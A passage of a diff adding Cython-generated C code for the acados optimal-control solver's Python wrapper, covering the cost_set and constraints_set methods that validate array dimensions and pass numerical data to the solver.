__Pyx_RefNannySetupContext("cost_set", 0); + + /* "acados_template/acados_ocp_solver_pyx.pyx":559 + * :param value: of appropriate size + * """ + * field = field_.encode('utf-8') # <<<<<<<<<<<<<< + * + * cdef int dims[2] + */ + if (unlikely(__pyx_v_field_ == Py_None)) { + PyErr_Format(PyExc_AttributeError, "'NoneType' object has no attribute '%.30s'", "encode"); + __PYX_ERR(0, 559, __pyx_L1_error) + } + __pyx_t_1 = PyUnicode_AsUTF8String(__pyx_v_field_); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 559, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_field = __pyx_t_1; + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":563 + * cdef int dims[2] + * acados_solver_common.ocp_nlp_cost_dims_get_from_attr(self.nlp_config, \ + * self.nlp_dims, self.nlp_out, stage, field, &dims[0]) # <<<<<<<<<<<<<< + * + * cdef double[::1,:] value + */ + __pyx_t_2 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_2) && PyErr_Occurred())) __PYX_ERR(0, 563, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":562 + * + * cdef int dims[2] + * acados_solver_common.ocp_nlp_cost_dims_get_from_attr(self.nlp_config, \ # <<<<<<<<<<<<<< + * self.nlp_dims, self.nlp_out, stage, field, &dims[0]) + * + */ + ocp_nlp_cost_dims_get_from_attr(__pyx_v_self->nlp_config, __pyx_v_self->nlp_dims, __pyx_v_self->nlp_out, __pyx_v_stage, __pyx_t_2, (&(__pyx_v_dims[0]))); + + /* "acados_template/acados_ocp_solver_pyx.pyx":567 + * cdef double[::1,:] value + * + * value_shape = value_.shape # <<<<<<<<<<<<<< + * if len(value_shape) == 1: + * value_shape = (value_shape[0], 0) + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v_value_, __pyx_n_s_shape); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 567, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_value_shape = __pyx_t_1; + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":568 + * + * value_shape = value_.shape + * if len(value_shape) == 1: # <<<<<<<<<<<<<< + * value_shape = (value_shape[0], 0) + * value = np.asfortranarray(value_[None,:]) + */ + __pyx_t_3 = PyObject_Length(__pyx_v_value_shape); if (unlikely(__pyx_t_3 == ((Py_ssize_t)-1))) __PYX_ERR(0, 568, __pyx_L1_error) + __pyx_t_4 = (__pyx_t_3 == 1); + if (__pyx_t_4) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":569 + * value_shape = value_.shape + * if len(value_shape) == 1: + * value_shape = (value_shape[0], 0) # <<<<<<<<<<<<<< + * value = np.asfortranarray(value_[None,:]) + * + */ + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_value_shape, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 569, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = PyTuple_New(2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 569, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_t_1); + __Pyx_INCREF(__pyx_int_0); + __Pyx_GIVEREF(__pyx_int_0); + PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_int_0); + __pyx_t_1 = 0; + __Pyx_DECREF_SET(__pyx_v_value_shape, __pyx_t_5); + __pyx_t_5 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":570 + * if len(value_shape) == 1: + * value_shape = (value_shape[0], 0) + * value = np.asfortranarray(value_[None,:]) # <<<<<<<<<<<<<< + * + * elif len(value_shape) == 2: + */ + __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_np); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 570, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_6 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_asfortranarray); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 570, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyObject_GetItem(__pyx_v_value_, __pyx_tuple__26); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 570, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_7 = NULL; + __pyx_t_8 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_6))) { + __pyx_t_7 = PyMethod_GET_SELF(__pyx_t_6); + if (likely(__pyx_t_7)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_6); + __Pyx_INCREF(__pyx_t_7); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_6, function); + __pyx_t_8 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_7, __pyx_t_1}; + __pyx_t_5 = __Pyx_PyObject_FastCall(__pyx_t_6, __pyx_callargs+1-__pyx_t_8, 1+__pyx_t_8); + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 570, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + } + __pyx_t_9 = __Pyx_PyObject_to_MemoryviewSlice_dcd__double(__pyx_t_5, PyBUF_WRITABLE); if (unlikely(!__pyx_t_9.memview)) __PYX_ERR(0, 570, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_v_value = __pyx_t_9; + __pyx_t_9.memview = NULL; + __pyx_t_9.data = NULL; + + /* "acados_template/acados_ocp_solver_pyx.pyx":568 + * + * value_shape = value_.shape + * if len(value_shape) == 1: # <<<<<<<<<<<<<< + * value_shape = (value_shape[0], 0) + * value = np.asfortranarray(value_[None,:]) + */ + goto __pyx_L3; + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":572 + * value = np.asfortranarray(value_[None,:]) + * + * elif len(value_shape) == 2: # <<<<<<<<<<<<<< + * # Get elements in column major order + * value = np.asfortranarray(value_) + */ + __pyx_t_3 = PyObject_Length(__pyx_v_value_shape); if (unlikely(__pyx_t_3 == ((Py_ssize_t)-1))) __PYX_ERR(0, 572, __pyx_L1_error) + __pyx_t_4 = (__pyx_t_3 == 2); + if (__pyx_t_4) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":574 + * elif len(value_shape) == 2: + * # Get elements in column major order + * value = np.asfortranarray(value_) # <<<<<<<<<<<<<< + * + * if value_shape[0] != dims[0] or value_shape[1] != dims[1]: + */ + __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_np); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 574, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_t_6, __pyx_n_s_asfortranarray); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 574, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __pyx_t_6 = NULL; + __pyx_t_8 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_6 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_6)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_6); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_8 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_6, __pyx_v_value_}; + __pyx_t_5 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_8, 1+__pyx_t_8); + __Pyx_XDECREF(__pyx_t_6); __pyx_t_6 = 0; + if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 574, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_t_9 = __Pyx_PyObject_to_MemoryviewSlice_dcd__double(__pyx_t_5, PyBUF_WRITABLE); if (unlikely(!__pyx_t_9.memview)) __PYX_ERR(0, 574, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_v_value = __pyx_t_9; + __pyx_t_9.memview = NULL; + __pyx_t_9.data = NULL; + + /* "acados_template/acados_ocp_solver_pyx.pyx":572 + * value = np.asfortranarray(value_[None,:]) + * + * elif len(value_shape) == 2: # <<<<<<<<<<<<<< + * # Get elements in column major order + * value = np.asfortranarray(value_) + */ + } + __pyx_L3:; + + /* "acados_template/acados_ocp_solver_pyx.pyx":576 + * value = np.asfortranarray(value_) + * + * if value_shape[0] != dims[0] or value_shape[1] != dims[1]: # <<<<<<<<<<<<<< + * raise Exception('AcadosOcpSolverCython.cost_set(): mismatching dimension' + + * f' for field "{field_}" at stage {stage} with dimension {tuple(dims)} (you have {value_shape})') + */ + __pyx_t_5 = __Pyx_GetItemInt(__pyx_v_value_shape, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 576, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_1 = __Pyx_PyInt_From_int((__pyx_v_dims[0])); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 576, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_6 = PyObject_RichCompare(__pyx_t_5, __pyx_t_1, Py_NE); __Pyx_XGOTREF(__pyx_t_6); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 576, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_10 = __Pyx_PyObject_IsTrue(__pyx_t_6); if (unlikely((__pyx_t_10 < 0))) __PYX_ERR(0, 576, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + if (!__pyx_t_10) { + } else { + __pyx_t_4 = __pyx_t_10; + goto __pyx_L5_bool_binop_done; + } + __pyx_t_6 = __Pyx_GetItemInt(__pyx_v_value_shape, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 576, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_1 = __Pyx_PyInt_From_int((__pyx_v_dims[1])); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 576, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = PyObject_RichCompare(__pyx_t_6, __pyx_t_1, Py_NE); __Pyx_XGOTREF(__pyx_t_5); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 576, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_10 = __Pyx_PyObject_IsTrue(__pyx_t_5); if (unlikely((__pyx_t_10 < 0))) __PYX_ERR(0, 576, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_t_4 = __pyx_t_10; + __pyx_L5_bool_binop_done:; + if (unlikely(__pyx_t_4)) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":578 + * if value_shape[0] != dims[0] or value_shape[1] != dims[1]: + * raise Exception('AcadosOcpSolverCython.cost_set(): mismatching dimension' + + * f' for field "{field_}" at stage {stage} with dimension {tuple(dims)} (you have {value_shape})') # <<<<<<<<<<<<<< + * + * acados_solver_common.ocp_nlp_cost_model_set(self.nlp_config, \ + */ + __pyx_t_5 = PyTuple_New(9); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 578, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_3 = 0; + __pyx_t_11 = 127; + __Pyx_INCREF(__pyx_kp_u_for_field); + __pyx_t_3 += 12; + __Pyx_GIVEREF(__pyx_kp_u_for_field); + PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_kp_u_for_field); + __pyx_t_1 = __Pyx_PyUnicode_Unicode(__pyx_v_field_); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 578, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_11 = (__Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_1) > __pyx_t_11) ? __Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_1) : __pyx_t_11; + __pyx_t_3 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_1); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_t_1); + __pyx_t_1 = 0; + __Pyx_INCREF(__pyx_kp_u_at_stage); + __pyx_t_3 += 11; + __Pyx_GIVEREF(__pyx_kp_u_at_stage); + PyTuple_SET_ITEM(__pyx_t_5, 2, __pyx_kp_u_at_stage); + __pyx_t_1 = __Pyx_PyUnicode_From_int(__pyx_v_stage, 0, ' ', 'd'); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 578, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_1); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_5, 3, __pyx_t_1); + __pyx_t_1 = 0; + __Pyx_INCREF(__pyx_kp_u_with_dimension); + __pyx_t_3 += 16; + __Pyx_GIVEREF(__pyx_kp_u_with_dimension); + PyTuple_SET_ITEM(__pyx_t_5, 4, __pyx_kp_u_with_dimension); + __pyx_t_1 = __Pyx_carray_to_py_int(__pyx_v_dims, 2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 578, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_6 = __Pyx_PySequence_Tuple(__pyx_t_1); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 578, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyObject_FormatSimple(__pyx_t_6, __pyx_empty_unicode); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 578, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __pyx_t_11 = (__Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_1) > __pyx_t_11) ? __Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_1) : __pyx_t_11; + __pyx_t_3 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_1); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_5, 5, __pyx_t_1); + __pyx_t_1 = 0; + __Pyx_INCREF(__pyx_kp_u_you_have); + __pyx_t_3 += 11; + __Pyx_GIVEREF(__pyx_kp_u_you_have); + PyTuple_SET_ITEM(__pyx_t_5, 6, __pyx_kp_u_you_have); + __pyx_t_1 = __Pyx_PyObject_FormatSimple(__pyx_v_value_shape, __pyx_empty_unicode); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 578, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_11 = (__Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_1) > __pyx_t_11) ? __Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_1) : __pyx_t_11; + __pyx_t_3 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_1); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_5, 7, __pyx_t_1); + __pyx_t_1 = 0; + __Pyx_INCREF(__pyx_kp_u__7); + __pyx_t_3 += 1; + __Pyx_GIVEREF(__pyx_kp_u__7); + PyTuple_SET_ITEM(__pyx_t_5, 8, __pyx_kp_u__7); + __pyx_t_1 = __Pyx_PyUnicode_Join(__pyx_t_5, 9, __pyx_t_3, __pyx_t_11); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 578, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":577 + * + * if value_shape[0] != dims[0] or value_shape[1] != dims[1]: + * raise Exception('AcadosOcpSolverCython.cost_set(): mismatching dimension' + # <<<<<<<<<<<<<< + * f' for field "{field_}" at stage {stage} with dimension {tuple(dims)} (you have {value_shape})') + * + */ + __pyx_t_5 = __Pyx_PyUnicode_Concat(__pyx_kp_u_AcadosOcpSolverCython_cost_set_m, __pyx_t_1); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 577, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyObject_CallOneArg(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])), __pyx_t_5); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 577, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_Raise(__pyx_t_1, 0, 0, 0); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __PYX_ERR(0, 577, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":576 + * value = np.asfortranarray(value_) + * + * if value_shape[0] != dims[0] or value_shape[1] != dims[1]: # <<<<<<<<<<<<<< + * raise Exception('AcadosOcpSolverCython.cost_set(): mismatching dimension' + + * f' for field "{field_}" at stage {stage} with dimension {tuple(dims)} (you have {value_shape})') + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":581 + * + * acados_solver_common.ocp_nlp_cost_model_set(self.nlp_config, \ + * self.nlp_dims, self.nlp_in, stage, field, &value[0][0]) # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_12 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_12) && PyErr_Occurred())) __PYX_ERR(0, 581, __pyx_L1_error) + if (unlikely(!__pyx_v_value.memview)) { __Pyx_RaiseUnboundLocalError("value"); __PYX_ERR(0, 581, __pyx_L1_error) } + __pyx_t_13 = 0; + __pyx_t_14 = 0; + __pyx_t_8 = -1; + if (__pyx_t_13 < 0) { + __pyx_t_13 += __pyx_v_value.shape[0]; + if (unlikely(__pyx_t_13 < 0)) __pyx_t_8 = 0; + } else if (unlikely(__pyx_t_13 >= __pyx_v_value.shape[0])) __pyx_t_8 = 0; + if (__pyx_t_14 < 0) { + __pyx_t_14 += __pyx_v_value.shape[1]; + if (unlikely(__pyx_t_14 < 0)) __pyx_t_8 = 1; + } else if (unlikely(__pyx_t_14 >= __pyx_v_value.shape[1])) __pyx_t_8 = 1; + if (unlikely(__pyx_t_8 != -1)) { + __Pyx_RaiseBufferIndexError(__pyx_t_8); + __PYX_ERR(0, 581, __pyx_L1_error) + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":580 + * f' for field "{field_}" at stage {stage} with dimension {tuple(dims)} (you have {value_shape})') + * + * acados_solver_common.ocp_nlp_cost_model_set(self.nlp_config, \ # <<<<<<<<<<<<<< + * self.nlp_dims, self.nlp_in, stage, field, &value[0][0]) + * + */ + (void)(ocp_nlp_cost_model_set(__pyx_v_self->nlp_config, __pyx_v_self->nlp_dims, __pyx_v_self->nlp_in, __pyx_v_stage, __pyx_t_12, ((void *)(&(*((double *) ( /* dim=1 */ (( /* dim=0 */ ((char *) (((double *) __pyx_v_value.data) + __pyx_t_13)) ) + __pyx_t_14 * __pyx_v_value.strides[1]) ))))))); + + /* "acados_template/acados_ocp_solver_pyx.pyx":551 + * + * + * def cost_set(self, int stage, str field_, value_): # <<<<<<<<<<<<<< + * """ + * Set numerical data in the cost module of the solver. + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __PYX_XCLEAR_MEMVIEW(&__pyx_t_9, 1); + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.cost_set", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_field); + __PYX_XCLEAR_MEMVIEW(&__pyx_v_value, 1); + __Pyx_XDECREF(__pyx_v_value_shape); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":584 + * + * + * def constraints_set(self, int stage, str field_, value_): # <<<<<<<<<<<<<< + * """ + * Set numerical data in the constraint module of the solver. + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_39constraints_set(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +PyDoc_STRVAR(__pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_38constraints_set, "\n Set numerical data in the constraint module of the solver.\n\n :param stage: integer corresponding to shooting node\n :param field: string in ['lbx', 'ubx', 'lbu', 'ubu', 'lg', 'ug', 'lh', 'uh', 'uphi', 'C', 'D']\n :param value: of appropriate size\n "); +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_39constraints_set = {"constraints_set", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_39constraints_set, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_38constraints_set}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_39constraints_set(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + int __pyx_v_stage; + PyObject *__pyx_v_field_ = 0; + PyObject *__pyx_v_value_ = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("constraints_set (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_stage,&__pyx_n_s_field_2,&__pyx_n_s_value,0}; + PyObject* values[3] = {0,0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_stage)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 584, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_field_2)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 584, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("constraints_set", 1, 3, 3, 1); __PYX_ERR(0, 584, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_value)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 584, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("constraints_set", 1, 3, 3, 2); __PYX_ERR(0, 584, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "constraints_set") < 0)) __PYX_ERR(0, 584, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 3)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + } + __pyx_v_stage = __Pyx_PyInt_As_int(values[0]); if (unlikely((__pyx_v_stage == (int)-1) && PyErr_Occurred())) __PYX_ERR(0, 584, __pyx_L3_error) + __pyx_v_field_ = ((PyObject*)values[1]); + __pyx_v_value_ = values[2]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("constraints_set", 1, 3, 3, __pyx_nargs); __PYX_ERR(0, 584, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.constraints_set", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + if (unlikely(!__Pyx_ArgTypeTest(((PyObject *)__pyx_v_field_), (&PyUnicode_Type), 1, "field_", 1))) __PYX_ERR(0, 584, __pyx_L1_error) + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_38constraints_set(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self), __pyx_v_stage, __pyx_v_field_, __pyx_v_value_); + + /* function exit code */ + goto __pyx_L0; + __pyx_L1_error:; + __pyx_r = NULL; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_38constraints_set(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, int __pyx_v_stage, PyObject *__pyx_v_field_, PyObject *__pyx_v_value_) { + PyObject *__pyx_v_field = NULL; + int __pyx_v_dims[2]; + __Pyx_memviewslice __pyx_v_value = { 0, 0, { 0 }, { 0 }, { 0 } }; + PyObject *__pyx_v_value_shape = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + char const *__pyx_t_2; + Py_ssize_t __pyx_t_3; + int __pyx_t_4; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + int __pyx_t_8; + __Pyx_memviewslice __pyx_t_9 = { 0, 0, { 0 }, { 0 }, { 0 } }; + int __pyx_t_10; + Py_UCS4 __pyx_t_11; + char const *__pyx_t_12; + Py_ssize_t __pyx_t_13; + Py_ssize_t __pyx_t_14; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("constraints_set", 0); + + /* "acados_template/acados_ocp_solver_pyx.pyx":592 + * :param value: of appropriate size + * """ + * field = field_.encode('utf-8') # <<<<<<<<<<<<<< + * + * cdef int dims[2] + */ + if (unlikely(__pyx_v_field_ == Py_None)) { + PyErr_Format(PyExc_AttributeError, "'NoneType' object has no attribute '%.30s'", "encode"); + __PYX_ERR(0, 592, __pyx_L1_error) + } + __pyx_t_1 = PyUnicode_AsUTF8String(__pyx_v_field_); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 592, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_field = __pyx_t_1; + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":596 + * cdef int dims[2] + * acados_solver_common.ocp_nlp_constraint_dims_get_from_attr(self.nlp_config, \ + * self.nlp_dims, self.nlp_out, stage, field, &dims[0]) # <<<<<<<<<<<<<< + * + * cdef double[::1,:] value + */ + __pyx_t_2 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_2) && PyErr_Occurred())) __PYX_ERR(0, 596, __pyx_L1_error) + + /* 